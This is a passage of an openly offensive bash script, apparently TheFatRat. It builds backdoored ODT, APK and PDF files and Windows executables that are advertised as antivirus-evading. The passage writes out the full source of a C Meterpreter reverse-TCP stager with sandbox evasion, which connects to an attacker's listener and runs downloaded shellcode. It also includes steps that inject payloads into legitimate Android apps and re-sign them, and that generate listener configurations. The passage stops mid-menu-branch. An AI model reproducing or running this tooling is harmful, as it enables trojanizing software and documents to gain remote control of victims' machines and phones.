echo "set BODY $bodys" >> $meterp
echo "exploit" >> $meterp
echo "exit -y" >> $meterp
msploitr
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp"
rm -rf $meterp >/dev/null 2>&1
cat $path/temp/xterm.tmp | while read LINE
do
echo $LINE >> $msploit
done
rm -rf $path/temp/xterm.tmp >/dev/null 2>&1
echo ""
mv ~/.msf4/local/$fira.odt $path/output/$fira.odt >>$msploit 2>&1
echo -e $okegreen""
fidoc=$path/output/$fira.odt
if [ -f "$fidoc" ]
then
echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.odt "
echo -e
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
else
echo -e $red "There was a problem in the creation of your Backdoor DOC ,
check $path/logs/msploit.log for more information about the error ."
echo -e $green ""
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
fi
;;
6)
clear
menu
;;
*)
microsploit
;;
esac
}
#EMBEDBACKDOORAPK
function embedapk() {
clear
echo -e $okegreen"[ ]===========================================================================$okegreen[ ]"
echo -e $okegreen"[ ]$cyan $okegreen [ ]"
echo -e $okegreen"[ ]$cyan ) ( ) ) ( ( ) $okegreen [ ] ";
echo -e $okegreen"[ ]$cyan ( ( ( ( /( )\ ) ( /( ( /( )\ ) )\ ) ( /( ( $okegreen [ ] ";
echo -e $okegreen"[ ]$cyan )\ )\ )\ )\())(()/( )\()) )\()) (()/((()/( )\()) )\ ) $okegreen[ ] ";
echo -e $okegreen"[ ]$cyan ((_)((((_)( (((_) |((_)\ /(_)) ((_)\ ((_)\ /(_))/(_))((_)\ (()/( $okegreen[ ] ";
echo -e $okegreen"[ ]$cyan (_) )\_ )\ )\___ |_ ((_)(_))_ ((_) ((_) (_)) (_)) _((_) /(_))_ $okegreen[ ] ";
echo -e $okegreen"[ ]$cyan | _ ) (_)_\(_)((/ __|| |/ / | \ / _ \ / _ \ | _ \|_ _| | \| |(_)) __|$okegreen[ ] ";
echo -e $okegreen"[ ]$cyan | _ \ / _ \ | (__ ' < | |) || (_) || (_) || / | | | .\` | | (_ |$okegreen[ ] ";
echo -e $okegreen"[ ]$cyan |___/ /_/ \_\ \___| _|\_\ |___/ \___/ \___/ |_|_\|___| |_|\_| \___|$okegreen[ ]";
echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]"
echo -e $okegreen"[ ]$red Embed a Metasploit Payload in an original .apk files $okegreen[ ]"
echo -e $okegreen"[ ]$red This script is POC for injecting metasploit payload arbitary apk backdoor $okegreen[ ]"
echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]"
echo ""
echo "Cleaning Temp files"
rm -rf temp/*
sleep 2
echo "Done!"
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
copyfile=$(zenity --file-selection --file-filter='APK files (apk) | *.apk' --title="Select your app/game apk file");
cp $copyfile $path/temp/app.apk >/dev/null 2>&1
apkt="$path/temp/app.apk"
if [ ! -f $apkt ]; then
zenity --no-wrap --error --text="`printf "There was a problem copying your APK file \n to a temporary location \n try with other apk ."`"
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
echo ""
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
echo ""
echo ""
spinlong
echo ""
sleep 1
method=$(zenity --list --radiolist --column "Pick" --column "Action" TRUE "Use new Backdoor-apk method" FALSE "Use old Fatrat method" --text="Select tool to create apk :");
case $method in
"Use new Backdoor-apk method")
echo ""
spinlong
outf="app_backdoor.apk"
gboor2
rm -f $apkconfig >/dev/null 2>&1
touch $apkconfig
echo "app.apk" > $apkconfig
echo "Rat.apk" >> $apkconfig
echo $payload >> $apkconfig
echo $yourip >> $apkconfig
echo $yourport >> $apkconfig
./backdoor_apk
echo ""
sleep 2
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
clear
menu
;;
"Use old Fatrat method")
echo -e $okegreen ""
spinlong
#removing previous logs
rm -rf $log >/dev/null 2>&1
touch $log >/dev/null 2>&1
outf="app_backdoored.apk"
gboor2
echo -e $okegreen ""
echo "[*] Creating RAT payload with msfvenom"
#Creating payload and storing info in logfile
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/temp/payload.apk >>$log /dev/null 2>&1
#Checking if payload exists
pld=$path/temp/payload.apk
if [ -f "$pld" ]
then
echo "[✔] Done!"
else
echo -e $red ""
echo "[x] There was an error in the creation of the payload .
Check log file at : $log"
rm -rf temp/* > /dev/null 2>&1
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
clear
menu
fi
sleep 2
echo "[*] Creating a Valid Certificate"
#Creating certificate and storing info in logfile
$keytool -genkey -v -keystore $path/temp/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US" -keyalg RSA -keysize 2048 -validity 10000 >>$log 2>&1
#Checking if certificate was created
cert=$path/temp/debug.keystore
if [ -f "$cert" ]
then
echo "[✔] Done!"
else
echo -e $red ""
echo "[x] There was an error creating a valid certificate .
Check log file at : $log"
rm -rf temp/* > /dev/null 2>&1
menu
fi
sleep 2
echo "[*] Starting the merging process of RAT with the APK you selected"
echo -e $okegreen ""
#Starting the process of inserting the payload into original apk file
ruby $apkembed $path/temp/app.apk
sleep 2
echo -e $okegreen ""
#Checking if backdoor apk was created succefully
fiapk=$path/temp/app_backdoored.apk
if [ -f "$fiapk" ]
then
echo "[✔] Done!"
sleep 1
echo "[*] Signing your Rat APK"
$sign -verbose -keystore $path/temp/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA $path/temp/app_backdoored.apk androiddebugkey >>$log 2>&1
echo "[✔] Done!"
else
echo $red ""
echo "[x] There was an error in the creation of your RAT APK file , the possible reasons are :
- The architecture of the file is not for android
- The original APK is protected
- It was not possible to inject the payload in the hook you selected (in this case select a different hook point)
Check log file at : $log"
echo -e $okegreen ""
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
menu
fi
#looking if already exists a previous backdoor apk created and renaming it
ren=`shuf -i 1-1000 -n 1`
back=$path/backdoored/app_backdoored.apk
if [ -f "$back" ]
then
mv $path/backdoored/app_backdoored.apk $path/backdoored/app_backdoored_$ren.apk >>$log 2>&1
echo -e $yellow ""
echo "[!] FatRat Detected that you already had a previous created backdoor
file in ($path/backdoored/) with the name app_backdoored.apk ."
echo -e $okegreen ""
echo "[✔] FatRat have renamed your old backdoor to app_backdoored_$ren.apk"
# Moving apk backdoor to final destination
mv $path/temp/app_backdoored.apk $path/backdoored/app_backdoored.apk >>$log 2>&1
# Removing temp files
rm -rf temp/* > /dev/null 2>&1
else
# Moving apk backdoor to final destination
mv $path/temp/app_backdoored.apk $path/backdoored/app_backdoored.apk >>$log 2>&1
rm -rf temp/* > /dev/null 2>&1
fi
varopt="$path/backdoored/app_backdoored.apk"
if [ ! -f $varopt ]; then
echo -e $red ""
echo "[x] There was an error copying your Rat app to final destination .
Check log file at : $log"
rm -rf temp/* > /dev/null 2>&1
echo -e $okegreen ""
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
echo -e $green ""
echo "Your payload has been successfully & signed and it is located at :
$path/backdoored/app_backdoored.apk"
sleep 2
echo -e $okegreen ""
echo "[*] Removing temporary files"
sleep 2
rm -rf $path/temp/* >/dev/null 2>&1
echo "[✔] Done!"
zenity --question --text="`printf "Do you want to create a listener for this configuration \n to use in msfconsole in future ?"`"
if [ $? = 0 ] ; then
save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="myapk");
svf=$path/config/listeners/$save.rc
rm -rf $svf >/dev/null 2>&1
echo "use exploit/multi/handler" > $svf
echo "set PAYLOAD $payload" >> $svf
echo "set LHOST $yourip" >> $svf
echo "set LPORT $yourport" >> $svf
echo "exploit -j" >> $svf
echo -e $okegreen "Configuration file saved to $list/$save.rc"
fi
echo -e $okegreen ""
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
echo
clear
menu
;;
*)
clear
menu
;;
esac
}
###########################################################
#PwnWind v1.2
#Developed or original code Edo Maland (Screetsec)
############################################################
############################################################
function PwnWinds() {
clear
echo ""
echo ""
echo -e $cyan" [ Select an Option To Begin >>"
echo ""
echo -e $lightgreen" ________ ___ ______ _________ ";
echo " ___ __ \__ __________ | / /__(_)____________ /_______";
echo " __ /_/ /_ | /| / /_ __ \_ | /| / /__ /__ __ \ __ /__ ___/";
echo " _ ____/__ |/ |/ /_ / / /_ |/ |/ / _ / _ / / / /_/ / _(__ ) ";
echo " /_/ ____/|__/ /_/ /_/____/|__/ /_/ /_/ /_/\__,_/ /____/ ";
echo ""
echo -e $cyan" ______ "
echo " .- -. "
echo " / \ "
echo " |, .-. .-. ,| "
echo " | )(_ / \_ )( |"
echo " |/ /\ \| "
echo -e $red" $yellow (@_ $cyan <__ ^^ __> "
echo -e $red" _ ) \_______$cyan""\__|IIIIII|__/$red""____________________ "
echo -e $red" (_)$yellow\@8@8{}<$red""________________________________________$yellow> "
echo -e $red" )_/ $cyan \ IIIIII / "
echo -e $red" $yellow (@ $cyan -------- "
echo -e $cyan" PwnWind Version $red v1.2 "
echo -e $cyan" Pwned Windows with backdoor"
echo -e " Author : $red""Edo Maland (Screetsec)"
echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platform ";
echo ""
echo -e $yellow" [1] $okegreen Create a bat file+Powershell (FUD 100%)"
echo -e $yellow" [2] $okegreen Create exe file with C# + Powershell (FUD 100%) "
echo -e $yellow" [3] $okegreen Create exe file with apache + Powershell (FUD 100%)"
echo -e $yellow" [4] $okegreen Create exe file with C + Powershell (FUD 98 %)"
echo -e $yellow" [5] $okegreen Create Backdoor with C + Powershell + Embed Pdf (FUD 80%)"
echo -e $yellow" [6] $okegreen Create Backdoor with C / Meteperter_reverse_tcp (FUD 97%)"
echo -e $yellow" [7] $okegreen Create Backdoor with C / Metasploit Staging Protocol (FUD 98%)"
echo -e $yellow" [8] $okegreen Back to Menu "
echo -e $yellow" "
echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"pwnwind$okegreen]:"
echo -ne $okegreen" └─────► " ;tput sgr0
read fatrat1
if test $fatrat1 == '1' #NUMBER 1 BEBE
then
echo ""
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen ""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
read fira
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
$dave $payload $yourip $yourport > /dev/null 2>&1
echo ""
echo ""
cat powershell_attack.txt
sleep 2
rm unicorn.rc
mv powershell_attack.txt output/$fira.bat
echo ""
echo -e $okegreen""
echo -e "Backdoor Saved To output Folder "
elif test $fatrat1 == '2' #cPAGAR-POWERSHELL
then
echo ""
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
echo -e $okegreen ""
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
read fira
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
$pwned $payload $yourip $yourport > /dev/null 2>&1
echo ""
echo ""
s0=$(cat powershell_attack.txt | cut -d ' ' -f1)
s1=$(cat powershell_attack.txt | cut -d ' ' -f2)
s2=$(cat powershell_attack.txt | cut -d ' ' -f3)
s3=$(cat powershell_attack.txt | cut -d ' ' -f4)
s4=$(cat powershell_attack.txt | cut -d ' ' -f5)
sed s/PAYLOAD/$s0\ $s1\ $s2\ $s3\ $s4/g $B > $bcom
echo
dmcs $bcom -o "output/$fira.exe" > /dev/null 2>&1
rm unicorn.rc powershell_attack.txt $bcom
sleep 2
echo ""
echo -e $okegreen""
echo -e "Backdoor Saved To output Folder "
elif test $fatrat1 == '3' #Apachecompler
then
echo ""
echo -e $okegreen""
echo -e $okegreen " Starting Apache Server wait ..."
service apache2 start > /dev/null 2>&1
echo ""
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen ""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
read fira
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
$pwned $payload $yourip $yourport > /dev/null 2>&1
echo ""
echo $yourip >> "$out"
s0=$(cat $out | cut -d ' ' -f1)
sed s/SERVER/$s0/g $apache > $apachecom
echo
$COMPILER -Wall -mwindows icons/icon.res $apachecom -o "output/$fira.exe" > /dev/null 2>&1
rm unicorn.rc $apachecom $out
mv powershell_attack.txt $apache2
sleep 2
echo ""
echo -e $okegreen""
echo -e " Backdoor Saved To output Folder "
echo ""
echo -ne " Press any key to continue ......... "
read continue
elif test $fatrat1 == '4' #C AJA
then
echo ""
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen ""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
read fira
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
$pwned $payload $yourip $yourport > /dev/null 2>&1
echo ""
echo ""
s0=$(cat powershell_attack.txt | cut -d ' ' -f1)
s1=$(cat powershell_attack.txt | cut -d ' ' -f2)
s2=$(cat powershell_attack.txt | cut -d ' ' -f3)
s3=$(cat powershell_attack.txt | cut -d ' ' -f4)
s4=$(cat powershell_attack.txt | cut -d ' ' -f5)
sed s/PAYLOAD/$s0\ $s1\ $s2\ $s3\ $s4/g $C > $paycom
echo
$COMPILER -Wall -mwindows icons/icon.res $paycom -o "output/$fira.exe" > /dev/null 2>&1
rm unicorn.rc powershell_attack.txt $paycom
sleep 2
echo ""
echo -e $okegreen""
echo -e " Backdoor Saved To output Folder "
echo ""
echo -ne " Press any key to continue ......... "
read continue
elif test $fatrat1 == '5' #PDF+POWERSHELL+C
then
echo
echo -e $yellow" Worked on Adobe Reader v8.x, v9.x / Windows XP SP3 / Windows 7/Vista ( English )"
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen ""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
read fira
echo ""
echo -ne $okegreen " Located Original PDF file for embed (example:/TheFatRat/PE/original.pdf) :" ;tput sgr0
read embedpdf
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
$pwned $payload $yourip $yourport > /dev/null 2>&1
echo ""
echo ""
s0=$(cat powershell_attack.txt | cut -d ' ' -f1)
s1=$(cat powershell_attack.txt | cut -d ' ' -f2)
s2=$(cat powershell_attack.txt | cut -d ' ' -f3)
s3=$(cat powershell_attack.txt | cut -d ' ' -f4)
s4=$(cat powershell_attack.txt | cut -d ' ' -f5)
sed s/PAYLOAD/$s0\ $s1\ $s2\ $s3\ $s4/g $C > $pdfcom
echo
$COMPILER -Wall -mwindows icons/icon.res $pdfcom -o "$path/output/backdoor_for_pdf.exe" > /dev/null 2>&1
sleep 2
echo " Wait for embed exe to pdf .... "
xterm -T " TheFatRat < PDF BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use windows/fileformat/adobe_pdf_embedded_exe; set EXE::Custom $path/output/backdoor_for_pdf.exe; set FILENAME $fira.pdf; set INFILENAME $embedpdf; exploit; exit -y'" > /dev/null 2>&1
echo ""
mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf
rm unicorn.rc powershell_attack.txt
echo -e $okegreen""
echo -e $yellow" Backdoor PDF Saved To output Folder "
echo ""
echo -ne $okegreen" Press any key to continue ......... "
read continue
elif test $fatrat1 == '6' #C Meteperter_reverse_tcp
then
echo ""
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen ""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
read fira
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
echo '#include <stdio.h>' > $reverse1
echo '#include <stdlib.h>' >> $reverse1
echo '#include <winsock2.h>' >> $reverse1
echo '#include <windows.h>' >> $reverse1
echo 'void winsock_init();' >> $reverse1
echo 'void Kick(SOCKET my_socket, char * error);' >> $reverse1
echo 'void genlol();' >> $reverse1
echo 'int recv_all(SOCKET my_socket, void * buffer, int len);' >> $reverse1
echo 'SOCKET wsconnect(char * targetip, int port);' >> $reverse1
echo 'int random_in_range (unsigned int min, unsigned int max);' >> $reverse1
echo 'char* rev(char* str);' >> $reverse1
echo 'int sandbox_evasion();' >> $reverse1
echo 'inline void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort);' >> $reverse1
echo 'void winsock_init() {' >> $reverse1
echo ' WSADATA wsaData;' >> $reverse1
echo ' WORD wVersionRequested;' >> $reverse1
echo ' wVersionRequested = MAKEWORD(2, 2);' >> $reverse1
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> $reverse1
echo ' printf("ws2_32.dll is out of date.\n");' >> $reverse1
echo ' WSACleanup();' >> $reverse1
echo ' exit(1);' >> $reverse1
echo ' }' >> $reverse1
echo '}' >> $reverse1
echo 'void Kick(SOCKET my_socket, char * error) {' >> $reverse1
echo ' printf("error: %s\n", error);' >> $reverse1
echo ' closesocket(my_socket);' >> $reverse1
echo ' WSACleanup();' >> $reverse1
echo ' exit(1);' >> $reverse1
echo ' }' >> $reverse1
echo 'void genlol(){' >> $reverse1
echo ' int num1, num2, num3;' >> $reverse1
echo ' num1=100;' >> $reverse1
echo ' while (num1<=5) {' >> $reverse1
echo ' num1=random_in_range(0,10000);' >> $reverse1
echo ' num2=random_in_range(0,10000);' >> $reverse1
echo ' num3=random_in_range(0,10000);' >> $reverse1
echo ' }' >> $reverse1
echo '}' >> $reverse1
echo 'int recv_all(SOCKET my_socket, void * buffer, int len) {' >> $reverse1
echo ' int tret = 0;' >> $reverse1
echo ' int nret = 0;' >> $reverse1
echo ' void * startb = buffer;' >> $reverse1
echo ' while (tret < len) {' >> $reverse1
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);' >> $reverse1
echo ' startb += nret;' >> $reverse1
echo ' tret += nret;' >> $reverse1
echo ' if (nret == SOCKET_ERROR)' >> $reverse1
echo ' Kick(my_socket, "Could not receive data");' >> $reverse1
echo ' }' >> $reverse1
echo ' return tret;' >> $reverse1
echo '}' >> $reverse1
echo 'SOCKET wsconnect(char * targetip, int port) {' >> $reverse1
echo ' struct hostent * target;' >> $reverse1
echo ' struct sockaddr_in sock;' >> $reverse1
echo ' SOCKET my_socket;' >> $reverse1
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);' >> $reverse1
echo ' if (my_socket == INVALID_SOCKET)' >> $reverse1
echo ' Kick(my_socket, "Cannot initialize socket");' >> $reverse1
echo ' target = gethostbyname(targetip);' >> $reverse1
echo ' if (target == NULL)' >> $reverse1
echo ' Kick(my_socket, "cannot resolve target");' >> $reverse1
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);' >> $reverse1
echo ' sock.sin_family = AF_INET;' >> $reverse1
echo ' sock.sin_port = htons(port);' >> $reverse1
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )' >> $reverse1
echo ' Kick(my_socket, "Could not connect");' >> $reverse1
echo ' return my_socket;' >> $reverse1
echo '}' >> $reverse1
echo 'int random_in_range (unsigned int min, unsigned int max)' >> $reverse1
echo '{' >> $reverse1
echo ' int base_random = rand(); ' >> $reverse1
echo ' if (RAND_MAX == base_random){' >> $reverse1
echo ' return random_in_range(min, max);' >> $reverse1
echo ' }' >> $reverse1
echo ' int range = max - min,' >> $reverse1
echo ' remainder = RAND_MAX % range,' >> $reverse1
echo ' bucket = RAND_MAX / range;' >> $reverse1
echo ' if (base_random < RAND_MAX - remainder) {' >> $reverse1
echo ' return min + base_random/bucket;' >> $reverse1
echo ' } else {' >> $reverse1
echo ' return random_in_range (min, max);' >> $reverse1
echo ' }' >> $reverse1
echo '}' >> $reverse1
echo 'char* rev(char* str)' >> $reverse1
echo '{' >> $reverse1
echo ' int end=strlen(str)-1;' >> $reverse1
echo ' int i;' >> $reverse1
echo ' for(i=5; i<end; i++)' >> $reverse1
echo ' {' >> $reverse1
echo ' str[i] ^= 1;' >> $reverse1
echo ' }' >> $reverse1
echo ' return str;' >> $reverse1
echo '}' >> $reverse1
echo 'int sandbox_evasion(){' >> $reverse1
echo ' MSG msg;' >> $reverse1
echo ' DWORD tc;' >> $reverse1
echo ' PostThreadMessage(GetCurrentThreadId(), WM_USER + 2, 23, 42);' >> $reverse1
echo ' if (!PeekMessage(&msg, (HWND)-1, 0, 0, 0))' >> $reverse1
echo ' return -1;' >> $reverse1
echo ' if (msg.message != WM_USER+2 || msg.wParam != 23 || msg.lParam != 42)' >> $reverse1
echo ' return -1;' >> $reverse1
echo ' tc = GetTickCount();' >> $reverse1
echo ' Sleep(650);' >> $reverse1
echo ' if (((GetTickCount() - tc) / 300) != 2)' >> $reverse1
echo ' return -1;' >> $reverse1
echo ' return 0;' >> $reverse1
echo '}' >> $reverse1
echo 'void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort){' >> $reverse1
echo ' ULONG32 size;' >> $reverse1
echo ' char * buffer;' >> $reverse1
echo ' void (*function)();' >> $reverse1
echo ' winsock_init();' >> $reverse1
echo ' SOCKET my_socket = wsconnect(listenerIP, listenerPort);' >> $reverse1
echo ' int count = recv(my_socket, (char *)&size, 4, 0);' >> $reverse1
echo ' if (count != 4 || size <= 0)' >> $reverse1
echo ' Kick(my_socket, "bad length value\n");' >> $reverse1
echo ' genlol();' >> $reverse1
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> $reverse1
echo ' genlol();' >> $reverse1
echo ' if (buffer == NULL)' >> $reverse1
echo ' Kick(my_socket, "bad buffer\n");' >> $reverse1
echo ' buffer[0] = 0xBF;' >> $reverse1
echo ' genlol();' >> $reverse1
echo ' memcpy(buffer + 1, &my_socket, 4);' >> $reverse1
echo ' genlol();' >> $reverse1
echo ' count = recv_all(my_socket, buffer + 5, size);' >> $reverse1
echo ' function = (void (*)())buffer;' >> $reverse1
echo ' function();' >> $reverse1
echo '}' >> $reverse1
echo 'void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){' >> $reverse1
echo ' ULONG32 size;' >> $reverse1
echo ' char * buffer;' >> $reverse1
echo ' void (*function)();' >> $reverse1
echo ' winsock_init();' >> $reverse1
echo ' SOCKET my_socket = wsconnect(listenerIP, listenerPort);' >> $reverse1
echo ' int count = recv(my_socket, (char *)&size, 4, 0);' >> $reverse1
echo ' if (count != 4 || size <= 0)' >> $reverse1
echo ' Kick(my_socket, "bad length value\n");' >> $reverse1
echo ' genlol();' >> $reverse1
echo ' buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> $reverse1
echo ' genlol();' >> $reverse1
echo ' if (buffer == NULL)' >> $reverse1
echo ' Kick(my_socket, "bad buffer\n");' >> $reverse1
echo ' buffer[0] = 0x48;' >> $reverse1
echo ' buffer[1] = 0xBF;' >> $reverse1
echo ' genlol();' >> $reverse1
echo ' memcpy(buffer + 2, &my_socket, 8);' >> $reverse1
echo ' genlol();' >> $reverse1
echo ' count = recv_all(my_socket, buffer + 10, size);' >> $reverse1
echo ' function = (void (*)())buffer;' >> $reverse1
echo ' function();' >> $reverse1
echo '}' >> $reverse1
echo 'int main(int argc, char *argv[]) {' >> $reverse1
echo -n 'char * defaultListenerIP = "' >> $reverse1
echo -n $yourip >> $reverse1
echo -n '";' >> $reverse1
echo '' >> $reverse1
echo -n 'unsigned int defaultListenerPort = ' >> $reverse1
echo -n $yourport >> $reverse1
echo -n ';' >> $reverse1
echo '' >> $reverse1
echo ' sandbox_evasion();' >> $reverse1
echo ' if(argc == 3){' >> $reverse1
echo ' #ifdef ISX64' >> $reverse1
echo ' reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));' >> $reverse1
echo ' #else' >> $reverse1
echo ' reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));' >> $reverse1
echo ' #endif' >> $reverse1
echo ' }else{' >> $reverse1
echo ' #ifdef ISX64' >> $reverse1
echo ' reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);' >> $reverse1
echo ' #else' >> $reverse1
echo ' reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);' >> $reverse1
echo ' #endif' >> $reverse1
echo ' }' >> $reverse1
echo ' return 0;' >> $reverse1
echo '}' >> $reverse1
$COMPILER $reverse1 -o output/$fira.exe -lws2_32 -mwindows
echo
echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0
rm $reverse1
echo -ne $yellow " Press Enter key to Contiune ..."
read aw
PwnWinds
elif test $fatrat1 == '7' #C Staging Protocol Meteperter
then
echo ""
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
